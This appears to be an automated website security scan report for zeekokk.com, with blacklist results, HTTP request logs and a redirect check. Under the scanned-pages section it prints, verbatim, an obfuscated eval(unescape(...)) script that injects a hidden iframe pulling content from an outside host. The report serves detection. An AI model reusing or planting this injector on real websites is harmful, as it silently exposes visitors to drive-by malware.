Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zeekokk.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zeekokk.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zeekokk.com/ | 200 OK Content-Length: 1721 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- <!-- var msg=314,d=document; <!-- eval(unescape ('%20%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%31%37%34%36%65%39%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%72%61%6d%6f%6e%65%79%6d%61%79%6b%65%72%2e%63%6e%2f%61%6c%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%38%35%32%37%34%29%2b%27%31%39%37%32%36%31%39%31%34%36%66%36%5c%27%20%77%69%64%74%68%3d%34%32%33%20%68%65%69%67%68%74%3d%34%33%38%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%3e%27%29') ); Antivirus reports:
| ||
http://zeekokk.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zeekokk.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 02 Oct 2014 21:50:44 GMT
Server: Microsoft-IIS/6.0
Content-Length: 1721
Content-Type: text/html
MicrosoftOfficeWebServer: 5.0_Pub
Set-Cookie: ASPSESSIONIDSADBRSRC=ODANDNMCDDIGLDFKFMNDMLIH; path=/
X-Powered-By: ASP.NET
...1721 bytes of data.
GET / HTTP/1.1
Host: zeekokk.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 02 Oct 2014 21:50:44 GMT
Server: Microsoft-IIS/6.0
Content-Length: 1721
Content-Type: text/html
MicrosoftOfficeWebServer: 5.0_Pub
Set-Cookie: ASPSESSIONIDSADBRSRC=ODANDNMCDDIGLDFKFMNDMLIH; path=/
X-Powered-By: ASP.NET
...1721 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: zeekokk.com
Referer: http://www.google.com/search?q=zeekokk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zeekokk.com
Referer: http://www.google.com/search?q=zeekokk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.